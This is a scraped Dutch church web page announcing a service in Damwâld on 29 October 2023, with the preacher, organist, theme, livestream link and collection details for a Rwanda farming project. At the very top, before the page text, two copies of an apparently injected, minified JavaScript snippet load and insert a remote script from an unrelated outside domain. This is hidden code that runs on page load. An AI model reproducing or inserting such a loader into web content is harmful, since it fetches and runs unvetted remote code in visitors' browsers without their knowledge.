;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 oktober 2023 9:30 uur - PKN Damwâld
zondag 29 oktober 2023
09:30 uur
Koffiedrinken na de dienst

Kerkdienst zondag 29 oktober 2023 9:30 uur

Thema: Voorbereiding Heilig Avondmaal

Informatie

Voorganger:Ds. J.W. Wind, Damwâld (wijziging t.o.v. de Paadwizer)
Organist:Nienke van der Heide-Visser
Thema:Voorbereiding Heilig Avondmaal
Mededeling:Koffiedrinken na de dienst
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Diaconie Rwanda – Met zusters werken aan gezond eten

Collecte Kerk in Actie (Zending) (collectenr. 23095)
Rwanda – Met zusters werken aan gezond eten
In het dichtbevolkte Rwanda leeft 70 procent van de inwoners van landbouw. Maar door gebrek aan grond kunnen veel mensen lastig rondkomen. Eén gewas verbouwen is niet genoeg om een gezin te voeden. Rwandese diaconessen trainen elk jaar 150 boeren en boerinnen op hun demonstratieboerderij. Ze leren hun veeteelt en groenten en fruit verbouwen met betere landbouwtechnieken. Na de training begeleiden ze de boeren in hun eigen dorp. Steeds meer ouders kunnen hun kinderen hierdoor gezonde voeding geven.

Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten